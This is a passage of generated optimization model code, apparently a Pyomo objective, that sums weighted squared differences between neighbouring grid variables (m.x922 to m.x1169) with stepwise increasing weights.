m.x923 - 1.3*m.x922)**2) + 2.63250101495027*((8.11690209768664*m.x950 - 8.11690209768664*m.x923)
**2 + (1.3*m.x924 - 1.3*m.x923)**2) + 2.63250101495027*((8.11690209768664*m.x951 -
8.11690209768664*m.x924)**2 + (1.3*m.x925 - 1.3*m.x924)**2) + 2.63250101495027*((8.11690209768664
*m.x952 - 8.11690209768664*m.x925)**2 + (1.3*m.x926 - 1.3*m.x925)**2) + 2.63250101495027*((
8.11690209768664*m.x953 - 8.11690209768664*m.x926)**2 + (1.3*m.x927 - 1.3*m.x926)**2) +
2.63250101495027*((8.11690209768664*m.x954 - 8.11690209768664*m.x927)**2 + (1.3*m.x928 - 1.3*
m.x927)**2) + 2.63250101495027*((8.11690209768664*m.x955 - 8.11690209768664*m.x928)**2 + (1.3*
m.x929 - 1.3*m.x928)**2) + 2.63250101495027*((8.11690209768664*m.x956 - 8.11690209768664*m.x929)
**2 + (1.3*m.x930 - 1.3*m.x929)**2) + 2.63250101495027*((8.11690209768664*m.x957 -
8.11690209768664*m.x930)**2 + (1.3*m.x931 - 1.3*m.x930)**2) + 2.63250101495027*((8.11690209768664
*m.x958 - 8.11690209768664*m.x931)**2 + (1.3*m.x932 - 1.3*m.x931)**2) + 2.63250101495027*((
8.11690209768664*m.x959 - 8.11690209768664*m.x932)**2 + (1.3*m.x933 - 1.3*m.x932)**2) +
2.63250101495027*((8.11690209768664*m.x960 - 8.11690209768664*m.x933)**2 + (1.3*m.x934 - 1.3*
m.x933)**2) + 2.63250101495027*((8.11690209768664*m.x961 - 8.11690209768664*m.x934)**2 + (1.3*
m.x935 - 1.3*m.x934)**2) + 2.63250101495027*((8.11690209768664*m.x962 - 8.11690209768664*m.x935)
**2 + (1.3*m.x936 - 1.3*m.x935)**2) + 2.63250101495027*((8.11690209768664*m.x963 -
8.11690209768664*m.x936)**2 + (1.3*m.x937 - 1.3*m.x936)**2) + 2.63250101495027*((8.11690209768664
*m.x964 - 8.11690209768664*m.x937)**2 + (1.3*m.x938 - 1.3*m.x937)**2) + 2.63250101495027*((
8.11690209768664*m.x965 - 8.11690209768664*m.x938)**2 + (1.3*m.x939 - 1.3*m.x938)**2) +
2.63250101495027*((8.11690209768664*m.x966 - 8.11690209768664*m.x939)**2 + (1.3*m.x940 - 1.3*
m.x939)**2) + 2.63250101495027*((8.11690209768664*m.x967 - 8.11690209768664*m.x940)**2 + (1.3*
m.x941 - 1.3*m.x940)**2) + 2.63250101495027*((8.11690209768664*m.x968 - 8.11690209768664*m.x941)
**2 + (1.3*m.x942 - 1.3*m.x941)**2) + 2.63250101495027*((8.11690209768664*m.x969 -
8.11690209768664*m.x942)**2 + (1.3*m.x943 - 1.3*m.x942)**2) + 2.63250101495027*((8.11690209768664
*m.x970 - 8.11690209768664*m.x943)**2 + (1.3*m.x944 - 1.3*m.x943)**2) + 2.63250101495027*((
8.11690209768664*m.x971 - 8.11690209768664*m.x944)**2 + (1.3*m.x945 - 1.3*m.x944)**2) +
2.72781770933351*((8.11690209768664*m.x973 - 8.11690209768664*m.x946)**2 + (1.3*m.x947 - 1.3*
m.x946)**2) + 2.72781770933351*((8.11690209768664*m.x974 - 8.11690209768664*m.x947)**2 + (1.3*
m.x948 - 1.3*m.x947)**2) + 2.72781770933351*((8.11690209768664*m.x975 - 8.11690209768664*m.x948)
**2 + (1.3*m.x949 - 1.3*m.x948)**2) + 2.72781770933351*((8.11690209768664*m.x976 -
8.11690209768664*m.x949)**2 + (1.3*m.x950 - 1.3*m.x949)**2) + 2.72781770933351*((8.11690209768664
*m.x977 - 8.11690209768664*m.x950)**2 + (1.3*m.x951 - 1.3*m.x950)**2) + 2.72781770933351*((
8.11690209768664*m.x978 - 8.11690209768664*m.x951)**2 + (1.3*m.x952 - 1.3*m.x951)**2) +
2.72781770933351*((8.11690209768664*m.x979 - 8.11690209768664*m.x952)**2 + (1.3*m.x953 - 1.3*
m.x952)**2) + 2.72781770933351*((8.11690209768664*m.x980 - 8.11690209768664*m.x953)**2 + (1.3*
m.x954 - 1.3*m.x953)**2) + 2.72781770933351*((8.11690209768664*m.x981 - 8.11690209768664*m.x954)
**2 + (1.3*m.x955 - 1.3*m.x954)**2) + 2.72781770933351*((8.11690209768664*m.x982 -
8.11690209768664*m.x955)**2 + (1.3*m.x956 - 1.3*m.x955)**2) + 2.72781770933351*((8.11690209768664
*m.x983 - 8.11690209768664*m.x956)**2 + (1.3*m.x957 - 1.3*m.x956)**2) + 2.72781770933351*((
8.11690209768664*m.x984 - 8.11690209768664*m.x957)**2 + (1.3*m.x958 - 1.3*m.x957)**2) +
2.72781770933351*((8.11690209768664*m.x985 - 8.11690209768664*m.x958)**2 + (1.3*m.x959 - 1.3*
m.x958)**2) + 2.72781770933351*((8.11690209768664*m.x986 - 8.11690209768664*m.x959)**2 + (1.3*
m.x960 - 1.3*m.x959)**2) + 2.72781770933351*((8.11690209768664*m.x987 - 8.11690209768664*m.x960)
**2 + (1.3*m.x961 - 1.3*m.x960)**2) + 2.72781770933351*((8.11690209768664*m.x988 -
8.11690209768664*m.x961)**2 + (1.3*m.x962 - 1.3*m.x961)**2) + 2.72781770933351*((8.11690209768664
*m.x989 - 8.11690209768664*m.x962)**2 + (1.3*m.x963 - 1.3*m.x962)**2) + 2.72781770933351*((
8.11690209768664*m.x990 - 8.11690209768664*m.x963)**2 + (1.3*m.x964 - 1.3*m.x963)**2) +
2.72781770933351*((8.11690209768664*m.x991 - 8.11690209768664*m.x964)**2 + (1.3*m.x965 - 1.3*
m.x964)**2) + 2.72781770933351*((8.11690209768664*m.x992 - 8.11690209768664*m.x965)**2 + (1.3*
m.x966 - 1.3*m.x965)**2) + 2.72781770933351*((8.11690209768664*m.x993 - 8.11690209768664*m.x966)
**2 + (1.3*m.x967 - 1.3*m.x966)**2) + 2.72781770933351*((8.11690209768664*m.x994 -
8.11690209768664*m.x967)**2 + (1.3*m.x968 - 1.3*m.x967)**2) + 2.72781770933351*((8.11690209768664
*m.x995 - 8.11690209768664*m.x968)**2 + (1.3*m.x969 - 1.3*m.x968)**2) + 2.72781770933351*((
8.11690209768664*m.x996 - 8.11690209768664*m.x969)**2 + (1.3*m.x970 - 1.3*m.x969)**2) +
2.72781770933351*((8.11690209768664*m.x997 - 8.11690209768664*m.x970)**2 + (1.3*m.x971 - 1.3*
m.x970)**2) + 2.72781770933351*((8.11690209768664*m.x998 - 8.11690209768664*m.x971)**2 + (1.3*
m.x972 - 1.3*m.x971)**2) + 2.82949687968474*((8.11690209768664*m.x1000 - 8.11690209768664*m.x973)
**2 + (1.3*m.x974 - 1.3*m.x973)**2) + 2.82949687968474*((8.11690209768664*m.x1001 -
8.11690209768664*m.x974)**2 + (1.3*m.x975 - 1.3*m.x974)**2) + 2.82949687968474*((8.11690209768664
*m.x1002 - 8.11690209768664*m.x975)**2 + (1.3*m.x976 - 1.3*m.x975)**2) + 2.82949687968474*((
8.11690209768664*m.x1003 - 8.11690209768664*m.x976)**2 + (1.3*m.x977 - 1.3*m.x976)**2) +
2.82949687968474*((8.11690209768664*m.x1004 - 8.11690209768664*m.x977)**2 + (1.3*m.x978 - 1.3*
m.x977)**2) + 2.82949687968474*((8.11690209768664*m.x1005 - 8.11690209768664*m.x978)**2 + (1.3*
m.x979 - 1.3*m.x978)**2) + 2.82949687968474*((8.11690209768664*m.x1006 - 8.11690209768664*m.x979)
**2 + (1.3*m.x980 - 1.3*m.x979)**2) + 2.82949687968474*((8.11690209768664*m.x1007 -
8.11690209768664*m.x980)**2 + (1.3*m.x981 - 1.3*m.x980)**2) + 2.82949687968474*((8.11690209768664
*m.x1008 - 8.11690209768664*m.x981)**2 + (1.3*m.x982 - 1.3*m.x981)**2) + 2.82949687968474*((
8.11690209768664*m.x1009 - 8.11690209768664*m.x982)**2 + (1.3*m.x983 - 1.3*m.x982)**2) +
2.82949687968474*((8.11690209768664*m.x1010 - 8.11690209768664*m.x983)**2 + (1.3*m.x984 - 1.3*
m.x983)**2) + 2.82949687968474*((8.11690209768664*m.x1011 - 8.11690209768664*m.x984)**2 + (1.3*
m.x985 - 1.3*m.x984)**2) + 2.82949687968474*((8.11690209768664*m.x1012 - 8.11690209768664*m.x985)
**2 + (1.3*m.x986 - 1.3*m.x985)**2) + 2.82949687968474*((8.11690209768664*m.x1013 -
8.11690209768664*m.x986)**2 + (1.3*m.x987 - 1.3*m.x986)**2) + 2.82949687968474*((8.11690209768664
*m.x1014 - 8.11690209768664*m.x987)**2 + (1.3*m.x988 - 1.3*m.x987)**2) + 2.82949687968474*((
8.11690209768664*m.x1015 - 8.11690209768664*m.x988)**2 + (1.3*m.x989 - 1.3*m.x988)**2) +
2.82949687968474*((8.11690209768664*m.x1016 - 8.11690209768664*m.x989)**2 + (1.3*m.x990 - 1.3*
m.x989)**2) + 2.82949687968474*((8.11690209768664*m.x1017 - 8.11690209768664*m.x990)**2 + (1.3*
m.x991 - 1.3*m.x990)**2) + 2.82949687968474*((8.11690209768664*m.x1018 - 8.11690209768664*m.x991)
**2 + (1.3*m.x992 - 1.3*m.x991)**2) + 2.82949687968474*((8.11690209768664*m.x1019 -
8.11690209768664*m.x992)**2 + (1.3*m.x993 - 1.3*m.x992)**2) + 2.82949687968474*((8.11690209768664
*m.x1020 - 8.11690209768664*m.x993)**2 + (1.3*m.x994 - 1.3*m.x993)**2) + 2.82949687968474*((
8.11690209768664*m.x1021 - 8.11690209768664*m.x994)**2 + (1.3*m.x995 - 1.3*m.x994)**2) +
2.82949687968474*((8.11690209768664*m.x1022 - 8.11690209768664*m.x995)**2 + (1.3*m.x996 - 1.3*
m.x995)**2) + 2.82949687968474*((8.11690209768664*m.x1023 - 8.11690209768664*m.x996)**2 + (1.3*
m.x997 - 1.3*m.x996)**2) + 2.82949687968474*((8.11690209768664*m.x1024 - 8.11690209768664*m.x997)
**2 + (1.3*m.x998 - 1.3*m.x997)**2) + 2.82949687968474*((8.11690209768664*m.x1025 -
8.11690209768664*m.x998)**2 + (1.3*m.x999 - 1.3*m.x998)**2) + 2.93626457097387*((8.11690209768664
*m.x1027 - 8.11690209768664*m.x1000)**2 + (1.3*m.x1001 - 1.3*m.x1000)**2) + 2.93626457097387*((
8.11690209768664*m.x1028 - 8.11690209768664*m.x1001)**2 + (1.3*m.x1002 - 1.3*m.x1001)**2) +
2.93626457097387*((8.11690209768664*m.x1029 - 8.11690209768664*m.x1002)**2 + (1.3*m.x1003 - 1.3*
m.x1002)**2) + 2.93626457097387*((8.11690209768664*m.x1030 - 8.11690209768664*m.x1003)**2 + (1.3*
m.x1004 - 1.3*m.x1003)**2) + 2.93626457097387*((8.11690209768664*m.x1031 - 8.11690209768664*
m.x1004)**2 + (1.3*m.x1005 - 1.3*m.x1004)**2) + 2.93626457097387*((8.11690209768664*m.x1032 -
8.11690209768664*m.x1005)**2 + (1.3*m.x1006 - 1.3*m.x1005)**2) + 2.93626457097387*((
8.11690209768664*m.x1033 - 8.11690209768664*m.x1006)**2 + (1.3*m.x1007 - 1.3*m.x1006)**2) +
2.93626457097387*((8.11690209768664*m.x1034 - 8.11690209768664*m.x1007)**2 + (1.3*m.x1008 - 1.3*
m.x1007)**2) + 2.93626457097387*((8.11690209768664*m.x1035 - 8.11690209768664*m.x1008)**2 + (1.3*
m.x1009 - 1.3*m.x1008)**2) + 2.93626457097387*((8.11690209768664*m.x1036 - 8.11690209768664*
m.x1009)**2 + (1.3*m.x1010 - 1.3*m.x1009)**2) + 2.93626457097387*((8.11690209768664*m.x1037 -
8.11690209768664*m.x1010)**2 + (1.3*m.x1011 - 1.3*m.x1010)**2) + 2.93626457097387*((
8.11690209768664*m.x1038 - 8.11690209768664*m.x1011)**2 + (1.3*m.x1012 - 1.3*m.x1011)**2) +
2.93626457097387*((8.11690209768664*m.x1039 - 8.11690209768664*m.x1012)**2 + (1.3*m.x1013 - 1.3*
m.x1012)**2) + 2.93626457097387*((8.11690209768664*m.x1040 - 8.11690209768664*m.x1013)**2 + (1.3*
m.x1014 - 1.3*m.x1013)**2) + 2.93626457097387*((8.11690209768664*m.x1041 - 8.11690209768664*
m.x1014)**2 + (1.3*m.x1015 - 1.3*m.x1014)**2) + 2.93626457097387*((8.11690209768664*m.x1042 -
8.11690209768664*m.x1015)**2 + (1.3*m.x1016 - 1.3*m.x1015)**2) + 2.93626457097387*((
8.11690209768664*m.x1043 - 8.11690209768664*m.x1016)**2 + (1.3*m.x1017 - 1.3*m.x1016)**2) +
2.93626457097387*((8.11690209768664*m.x1044 - 8.11690209768664*m.x1017)**2 + (1.3*m.x1018 - 1.3*
m.x1017)**2) + 2.93626457097387*((8.11690209768664*m.x1045 - 8.11690209768664*m.x1018)**2 + (1.3*
m.x1019 - 1.3*m.x1018)**2) + 2.93626457097387*((8.11690209768664*m.x1046 - 8.11690209768664*
m.x1019)**2 + (1.3*m.x1020 - 1.3*m.x1019)**2) + 2.93626457097387*((8.11690209768664*m.x1047 -
8.11690209768664*m.x1020)**2 + (1.3*m.x1021 - 1.3*m.x1020)**2) + 2.93626457097387*((
8.11690209768664*m.x1048 - 8.11690209768664*m.x1021)**2 + (1.3*m.x1022 - 1.3*m.x1021)**2) +
2.93626457097387*((8.11690209768664*m.x1049 - 8.11690209768664*m.x1022)**2 + (1.3*m.x1023 - 1.3*
m.x1022)**2) + 2.93626457097387*((8.11690209768664*m.x1050 - 8.11690209768664*m.x1023)**2 + (1.3*
m.x1024 - 1.3*m.x1023)**2) + 2.93626457097387*((8.11690209768664*m.x1051 - 8.11690209768664*
m.x1024)**2 + (1.3*m.x1025 - 1.3*m.x1024)**2) + 2.93626457097387*((8.11690209768664*m.x1052 -
8.11690209768664*m.x1025)**2 + (1.3*m.x1026 - 1.3*m.x1025)**2) + 3.04666329702967*((
8.11690209768664*m.x1054 - 8.11690209768664*m.x1027)**2 + (1.3*m.x1028 - 1.3*m.x1027)**2) +
3.04666329702967*((8.11690209768664*m.x1055 - 8.11690209768664*m.x1028)**2 + (1.3*m.x1029 - 1.3*
m.x1028)**2) + 3.04666329702967*((8.11690209768664*m.x1056 - 8.11690209768664*m.x1029)**2 + (1.3*
m.x1030 - 1.3*m.x1029)**2) + 3.04666329702967*((8.11690209768664*m.x1057 - 8.11690209768664*
m.x1030)**2 + (1.3*m.x1031 - 1.3*m.x1030)**2) + 3.04666329702967*((8.11690209768664*m.x1058 -
8.11690209768664*m.x1031)**2 + (1.3*m.x1032 - 1.3*m.x1031)**2) + 3.04666329702967*((
8.11690209768664*m.x1059 - 8.11690209768664*m.x1032)**2 + (1.3*m.x1033 - 1.3*m.x1032)**2) +
3.04666329702967*((8.11690209768664*m.x1060 - 8.11690209768664*m.x1033)**2 + (1.3*m.x1034 - 1.3*
m.x1033)**2) + 3.04666329702967*((8.11690209768664*m.x1061 - 8.11690209768664*m.x1034)**2 + (1.3*
m.x1035 - 1.3*m.x1034)**2) + 3.04666329702967*((8.11690209768664*m.x1062 - 8.11690209768664*
m.x1035)**2 + (1.3*m.x1036 - 1.3*m.x1035)**2) + 3.04666329702967*((8.11690209768664*m.x1063 -
8.11690209768664*m.x1036)**2 + (1.3*m.x1037 - 1.3*m.x1036)**2) + 3.04666329702967*((
8.11690209768664*m.x1064 - 8.11690209768664*m.x1037)**2 + (1.3*m.x1038 - 1.3*m.x1037)**2) +
3.04666329702967*((8.11690209768664*m.x1065 - 8.11690209768664*m.x1038)**2 + (1.3*m.x1039 - 1.3*
m.x1038)**2) + 3.04666329702967*((8.11690209768664*m.x1066 - 8.11690209768664*m.x1039)**2 + (1.3*
m.x1040 - 1.3*m.x1039)**2) + 3.04666329702967*((8.11690209768664*m.x1067 - 8.11690209768664*
m.x1040)**2 + (1.3*m.x1041 - 1.3*m.x1040)**2) + 3.04666329702967*((8.11690209768664*m.x1068 -
8.11690209768664*m.x1041)**2 + (1.3*m.x1042 - 1.3*m.x1041)**2) + 3.04666329702967*((
8.11690209768664*m.x1069 - 8.11690209768664*m.x1042)**2 + (1.3*m.x1043 - 1.3*m.x1042)**2) +
3.04666329702967*((8.11690209768664*m.x1070 - 8.11690209768664*m.x1043)**2 + (1.3*m.x1044 - 1.3*
m.x1043)**2) + 3.04666329702967*((8.11690209768664*m.x1071 - 8.11690209768664*m.x1044)**2 + (1.3*
m.x1045 - 1.3*m.x1044)**2) + 3.04666329702967*((8.11690209768664*m.x1072 - 8.11690209768664*
m.x1045)**2 + (1.3*m.x1046 - 1.3*m.x1045)**2) + 3.04666329702967*((8.11690209768664*m.x1073 -
8.11690209768664*m.x1046)**2 + (1.3*m.x1047 - 1.3*m.x1046)**2) + 3.04666329702967*((
8.11690209768664*m.x1074 - 8.11690209768664*m.x1047)**2 + (1.3*m.x1048 - 1.3*m.x1047)**2) +
3.04666329702967*((8.11690209768664*m.x1075 - 8.11690209768664*m.x1048)**2 + (1.3*m.x1049 - 1.3*
m.x1048)**2) + 3.04666329702967*((8.11690209768664*m.x1076 - 8.11690209768664*m.x1049)**2 + (1.3*
m.x1050 - 1.3*m.x1049)**2) + 3.04666329702967*((8.11690209768664*m.x1077 - 8.11690209768664*
m.x1050)**2 + (1.3*m.x1051 - 1.3*m.x1050)**2) + 3.04666329702967*((8.11690209768664*m.x1078 -
8.11690209768664*m.x1051)**2 + (1.3*m.x1052 - 1.3*m.x1051)**2) + 3.04666329702967*((
8.11690209768664*m.x1079 - 8.11690209768664*m.x1052)**2 + (1.3*m.x1053 - 1.3*m.x1052)**2) +
3.15906217094175*((8.11690209768664*m.x1081 - 8.11690209768664*m.x1054)**2 + (1.3*m.x1055 - 1.3*
m.x1054)**2) + 3.15906217094175*((8.11690209768664*m.x1082 - 8.11690209768664*m.x1055)**2 + (1.3*
m.x1056 - 1.3*m.x1055)**2) + 3.15906217094175*((8.11690209768664*m.x1083 - 8.11690209768664*
m.x1056)**2 + (1.3*m.x1057 - 1.3*m.x1056)**2) + 3.15906217094175*((8.11690209768664*m.x1084 -
8.11690209768664*m.x1057)**2 + (1.3*m.x1058 - 1.3*m.x1057)**2) + 3.15906217094175*((
8.11690209768664*m.x1085 - 8.11690209768664*m.x1058)**2 + (1.3*m.x1059 - 1.3*m.x1058)**2) +
3.15906217094175*((8.11690209768664*m.x1086 - 8.11690209768664*m.x1059)**2 + (1.3*m.x1060 - 1.3*
m.x1059)**2) + 3.15906217094175*((8.11690209768664*m.x1087 - 8.11690209768664*m.x1060)**2 + (1.3*
m.x1061 - 1.3*m.x1060)**2) + 3.15906217094175*((8.11690209768664*m.x1088 - 8.11690209768664*
m.x1061)**2 + (1.3*m.x1062 - 1.3*m.x1061)**2) + 3.15906217094175*((8.11690209768664*m.x1089 -
8.11690209768664*m.x1062)**2 + (1.3*m.x1063 - 1.3*m.x1062)**2) + 3.15906217094175*((
8.11690209768664*m.x1090 - 8.11690209768664*m.x1063)**2 + (1.3*m.x1064 - 1.3*m.x1063)**2) +
3.15906217094175*((8.11690209768664*m.x1091 - 8.11690209768664*m.x1064)**2 + (1.3*m.x1065 - 1.3*
m.x1064)**2) + 3.15906217094175*((8.11690209768664*m.x1092 - 8.11690209768664*m.x1065)**2 + (1.3*
m.x1066 - 1.3*m.x1065)**2) + 3.15906217094175*((8.11690209768664*m.x1093 - 8.11690209768664*
m.x1066)**2 + (1.3*m.x1067 - 1.3*m.x1066)**2) + 3.15906217094175*((8.11690209768664*m.x1094 -
8.11690209768664*m.x1067)**2 + (1.3*m.x1068 - 1.3*m.x1067)**2) + 3.15906217094175*((
8.11690209768664*m.x1095 - 8.11690209768664*m.x1068)**2 + (1.3*m.x1069 - 1.3*m.x1068)**2) +
3.15906217094175*((8.11690209768664*m.x1096 - 8.11690209768664*m.x1069)**2 + (1.3*m.x1070 - 1.3*
m.x1069)**2) + 3.15906217094175*((8.11690209768664*m.x1097 - 8.11690209768664*m.x1070)**2 + (1.3*
m.x1071 - 1.3*m.x1070)**2) + 3.15906217094175*((8.11690209768664*m.x1098 - 8.11690209768664*
m.x1071)**2 + (1.3*m.x1072 - 1.3*m.x1071)**2) + 3.15906217094175*((8.11690209768664*m.x1099 -
8.11690209768664*m.x1072)**2 + (1.3*m.x1073 - 1.3*m.x1072)**2) + 3.15906217094175*((
8.11690209768664*m.x1100 - 8.11690209768664*m.x1073)**2 + (1.3*m.x1074 - 1.3*m.x1073)**2) +
3.15906217094175*((8.11690209768664*m.x1101 - 8.11690209768664*m.x1074)**2 + (1.3*m.x1075 - 1.3*
m.x1074)**2) + 3.15906217094175*((8.11690209768664*m.x1102 - 8.11690209768664*m.x1075)**2 + (1.3*
m.x1076 - 1.3*m.x1075)**2) + 3.15906217094175*((8.11690209768664*m.x1103 - 8.11690209768664*
m.x1076)**2 + (1.3*m.x1077 - 1.3*m.x1076)**2) + 3.15906217094175*((8.11690209768664*m.x1104 -
8.11690209768664*m.x1077)**2 + (1.3*m.x1078 - 1.3*m.x1077)**2) + 3.15906217094175*((
8.11690209768664*m.x1105 - 8.11690209768664*m.x1078)**2 + (1.3*m.x1079 - 1.3*m.x1078)**2) +
3.15906217094175*((8.11690209768664*m.x1106 - 8.11690209768664*m.x1079)**2 + (1.3*m.x1080 - 1.3*
m.x1079)**2) + 3.27167662312136*((8.11690209768664*m.x1108 - 8.11690209768664*m.x1081)**2 + (1.3*
m.x1082 - 1.3*m.x1081)**2) + 3.27167662312136*((8.11690209768664*m.x1109 - 8.11690209768664*
m.x1082)**2 + (1.3*m.x1083 - 1.3*m.x1082)**2) + 3.27167662312136*((8.11690209768664*m.x1110 -
8.11690209768664*m.x1083)**2 + (1.3*m.x1084 - 1.3*m.x1083)**2) + 3.27167662312136*((
8.11690209768664*m.x1111 - 8.11690209768664*m.x1084)**2 + (1.3*m.x1085 - 1.3*m.x1084)**2) +
3.27167662312136*((8.11690209768664*m.x1112 - 8.11690209768664*m.x1085)**2 + (1.3*m.x1086 - 1.3*
m.x1085)**2) + 3.27167662312136*((8.11690209768664*m.x1113 - 8.11690209768664*m.x1086)**2 + (1.3*
m.x1087 - 1.3*m.x1086)**2) + 3.27167662312136*((8.11690209768664*m.x1114 - 8.11690209768664*
m.x1087)**2 + (1.3*m.x1088 - 1.3*m.x1087)**2) + 3.27167662312136*((8.11690209768664*m.x1115 -
8.11690209768664*m.x1088)**2 + (1.3*m.x1089 - 1.3*m.x1088)**2) + 3.27167662312136*((
8.11690209768664*m.x1116 - 8.11690209768664*m.x1089)**2 + (1.3*m.x1090 - 1.3*m.x1089)**2) +
3.27167662312136*((8.11690209768664*m.x1117 - 8.11690209768664*m.x1090)**2 + (1.3*m.x1091 - 1.3*
m.x1090)**2) + 3.27167662312136*((8.11690209768664*m.x1118 - 8.11690209768664*m.x1091)**2 + (1.3*
m.x1092 - 1.3*m.x1091)**2) + 3.27167662312136*((8.11690209768664*m.x1119 - 8.11690209768664*
m.x1092)**2 + (1.3*m.x1093 - 1.3*m.x1092)**2) + 3.27167662312136*((8.11690209768664*m.x1120 -
8.11690209768664*m.x1093)**2 + (1.3*m.x1094 - 1.3*m.x1093)**2) + 3.27167662312136*((
8.11690209768664*m.x1121 - 8.11690209768664*m.x1094)**2 + (1.3*m.x1095 - 1.3*m.x1094)**2) +
3.27167662312136*((8.11690209768664*m.x1122 - 8.11690209768664*m.x1095)**2 + (1.3*m.x1096 - 1.3*
m.x1095)**2) + 3.27167662312136*((8.11690209768664*m.x1123 - 8.11690209768664*m.x1096)**2 + (1.3*
m.x1097 - 1.3*m.x1096)**2) + 3.27167662312136*((8.11690209768664*m.x1124 - 8.11690209768664*
m.x1097)**2 + (1.3*m.x1098 - 1.3*m.x1097)**2) + 3.27167662312136*((8.11690209768664*m.x1125 -
8.11690209768664*m.x1098)**2 + (1.3*m.x1099 - 1.3*m.x1098)**2) + 3.27167662312136*((
8.11690209768664*m.x1126 - 8.11690209768664*m.x1099)**2 + (1.3*m.x1100 - 1.3*m.x1099)**2) +
3.27167662312136*((8.11690209768664*m.x1127 - 8.11690209768664*m.x1100)**2 + (1.3*m.x1101 - 1.3*
m.x1100)**2) + 3.27167662312136*((8.11690209768664*m.x1128 - 8.11690209768664*m.x1101)**2 + (1.3*
m.x1102 - 1.3*m.x1101)**2) + 3.27167662312136*((8.11690209768664*m.x1129 - 8.11690209768664*
m.x1102)**2 + (1.3*m.x1103 - 1.3*m.x1102)**2) + 3.27167662312136*((8.11690209768664*m.x1130 -
8.11690209768664*m.x1103)**2 + (1.3*m.x1104 - 1.3*m.x1103)**2) + 3.27167662312136*((
8.11690209768664*m.x1131 - 8.11690209768664*m.x1104)**2 + (1.3*m.x1105 - 1.3*m.x1104)**2) +
3.27167662312136*((8.11690209768664*m.x1132 - 8.11690209768664*m.x1105)**2 + (1.3*m.x1106 - 1.3*
m.x1105)**2) + 3.27167662312136*((8.11690209768664*m.x1133 - 8.11690209768664*m.x1106)**2 + (1.3*
m.x1107 - 1.3*m.x1106)**2) + 3.38259803840007*((8.11690209768664*m.x1135 - 8.11690209768664*
m.x1108)**2 + (1.3*m.x1109 - 1.3*m.x1108)**2) + 3.38259803840007*((8.11690209768664*m.x1136 -
8.11690209768664*m.x1109)**2 + (1.3*m.x1110 - 1.3*m.x1109)**2) + 3.38259803840007*((
8.11690209768664*m.x1137 - 8.11690209768664*m.x1110)**2 + (1.3*m.x1111 - 1.3*m.x1110)**2) +
3.38259803840007*((8.11690209768664*m.x1138 - 8.11690209768664*m.x1111)**2 + (1.3*m.x1112 - 1.3*
m.x1111)**2) + 3.38259803840007*((8.11690209768664*m.x1139 - 8.11690209768664*m.x1112)**2 + (1.3*
m.x1113 - 1.3*m.x1112)**2) + 3.38259803840007*((8.11690209768664*m.x1140 - 8.11690209768664*
m.x1113)**2 + (1.3*m.x1114 - 1.3*m.x1113)**2) + 3.38259803840007*((8.11690209768664*m.x1141 -
8.11690209768664*m.x1114)**2 + (1.3*m.x1115 - 1.3*m.x1114)**2) + 3.38259803840007*((
8.11690209768664*m.x1142 - 8.11690209768664*m.x1115)**2 + (1.3*m.x1116 - 1.3*m.x1115)**2) +
3.38259803840007*((8.11690209768664*m.x1143 - 8.11690209768664*m.x1116)**2 + (1.3*m.x1117 - 1.3*
m.x1116)**2) + 3.38259803840007*((8.11690209768664*m.x1144 - 8.11690209768664*m.x1117)**2 + (1.3*
m.x1118 - 1.3*m.x1117)**2) + 3.38259803840007*((8.11690209768664*m.x1145 - 8.11690209768664*
m.x1118)**2 + (1.3*m.x1119 - 1.3*m.x1118)**2) + 3.38259803840007*((8.11690209768664*m.x1146 -
8.11690209768664*m.x1119)**2 + (1.3*m.x1120 - 1.3*m.x1119)**2) + 3.38259803840007*((
8.11690209768664*m.x1147 - 8.11690209768664*m.x1120)**2 + (1.3*m.x1121 - 1.3*m.x1120)**2) +
3.38259803840007*((8.11690209768664*m.x1148 - 8.11690209768664*m.x1121)**2 + (1.3*m.x1122 - 1.3*
m.x1121)**2) + 3.38259803840007*((8.11690209768664*m.x1149 - 8.11690209768664*m.x1122)**2 + (1.3*
m.x1123 - 1.3*m.x1122)**2) + 3.38259803840007*((8.11690209768664*m.x1150 - 8.11690209768664*
m.x1123)**2 + (1.3*m.x1124 - 1.3*m.x1123)**2) + 3.38259803840007*((8.11690209768664*m.x1151 -
8.11690209768664*m.x1124)**2 + (1.3*m.x1125 - 1.3*m.x1124)**2) + 3.38259803840007*((
8.11690209768664*m.x1152 - 8.11690209768664*m.x1125)**2 + (1.3*m.x1126 - 1.3*m.x1125)**2) +
3.38259803840007*((8.11690209768664*m.x1153 - 8.11690209768664*m.x1126)**2 + (1.3*m.x1127 - 1.3*
m.x1126)**2) + 3.38259803840007*((8.11690209768664*m.x1154 - 8.11690209768664*m.x1127)**2 + (1.3*
m.x1128 - 1.3*m.x1127)**2) + 3.38259803840007*((8.11690209768664*m.x1155 - 8.11690209768664*
m.x1128)**2 + (1.3*m.x1129 - 1.3*m.x1128)**2) + 3.38259803840007*((8.11690209768664*m.x1156 -
8.11690209768664*m.x1129)**2 + (1.3*m.x1130 - 1.3*m.x1129)**2) + 3.38259803840007*((
8.11690209768664*m.x1157 - 8.11690209768664*m.x1130)**2 + (1.3*m.x1131 - 1.3*m.x1130)**2) +
3.38259803840007*((8.11690209768664*m.x1158 - 8.11690209768664*m.x1131)**2 + (1.3*m.x1132 - 1.3*
m.x1131)**2) + 3.38259803840007*((8.11690209768664*m.x1159 - 8.11690209768664*m.x1132)**2 + (1.3*
m.x1133 - 1.3*m.x1132)**2) + 3.38259803840007*((8.11690209768664*m.x1160 - 8.11690209768664*
m.x1133)**2 + (1.3*m.x1134 - 1.3*m.x1133)**2) + 3.48983301616632*((8.11690209768664*m.x1162 -
8.11690209768664*m.x1135)**2 + (1.3*m.x1136 - 1.3*m.x1135)**2) + 3.48983301616632*((
8.11690209768664*m.x1163 - 8.11690209768664*m.x1136)**2 + (1.3*m.x1137 - 1.3*m.x1136)**2) +
3.48983301616632*((8.11690209768664*m.x1164 - 8.11690209768664*m.x1137)**2 + (1.3*m.x1138 - 1.3*
m.x1137)**2) + 3.48983301616632*((8.11690209768664*m.x1165 - 8.11690209768664*m.x1138)**2 + (1.3*
m.x1139 - 1.3*m.x1138)**2) + 3.48983301616632*((8.11690209768664*m.x1166 - 8.11690209768664*
m.x1139)**2 + (1.3*m.x1140 - 1.3*m.x1139)**2) + 3.48983301616632*((8.11690209768664*m.x1167 -
8.11690209768664*m.x1140)**2 + (1.3*m.x1141 - 1.3*m.x1140)**2) + 3.48983301616632*((
8.11690209768664*m.x1168 - 8.11690209768664*m.x1141)**2 + (1.3*m.x1142 - 1.3*m.x1141)**2) +
3.48983301616632*((8.11690209768664*m.x1169 - 8.11690209768664*m.x1142)**2 + (1.3*m.x1143 - 1.3*
